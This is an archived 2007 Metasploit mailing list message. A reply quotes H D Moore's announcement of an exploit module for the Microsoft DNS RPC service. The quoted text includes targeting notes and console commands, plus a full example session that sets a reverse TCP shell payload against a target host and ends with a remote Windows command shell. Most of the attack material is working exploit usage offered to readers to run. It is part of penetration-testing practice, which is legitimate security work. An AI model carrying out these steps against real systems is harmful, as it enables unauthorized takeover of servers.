Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: giorgio.casali at gmail.com (Giorgio Casali)
Date: Tue, 17 Apr 2007 17:11:55 +0200
Hi, is it possible to have it for the Italian version? Thanks 2007/4/16, H D Moore <hdm at metasploit.com>:
The exploit module has been merged to stable, use 'Online Update' or 'svn update' to grab it. The module's default target will exploit Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2. All targets are designed for the English locale. If you have a non-English system, submit targets. The Windows 2003 SP0 target may not be reliable. The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in use. We use the SEH overwrite method for all targets and the /GS stack prevention means we will not be able to use standard hardware DEP bypass techniques (return to NTDLL to disable NX). The RPORT option defaults to '0' and will contact the endpoint mapper of the target system in order to determine the real RPC port at runtime. This saves a step, but it does mean that one of port 135 or 593 needs to be accessible on the target. If you are attacking a system with only ports > 1025 allowed through the firewall, you will need to locate the RPC service and set RPORT manually. To use the module, open the console interface, and run: msf> use exploit/windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload> msf exploit(msdns_zonename) > set <payload options> msf exploit(msdns_zonename) > set RHOST <target> msf exploit(msdns_zonename) > exploit -- example -- < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ msf v3.0 + -- --=[ 184 exploits - 104 payloads + -- --=[ 17 encoders - 5 nops =[ 33 aux msf > use exploit/windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(msdns_zonename) > set LHOST 192.168.0.127 LHOST => 192.168.0.127 msf exploit(msdns_zonename) > set LPORT 4444 LPORT => 4444 msf exploit(msdns_zonename) > set RHOST 172.16.233.128 RHOST => 172.16.233.128 msf exploit(msdns_zonename) > exploit [*] Started reverse handler [*] Connecting to the endpoint mapper service... [*] Discovered Microsoft DNS Server RPC service on port 1356 [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English... [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128 [0] ... [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128 [0] ... [*] Sending exploit... [*] Error: no response from dcerpc service [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:45196) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. c:\>
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070417/63720aef/attachment.htm>
Current thread:
- Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
- Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
- Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)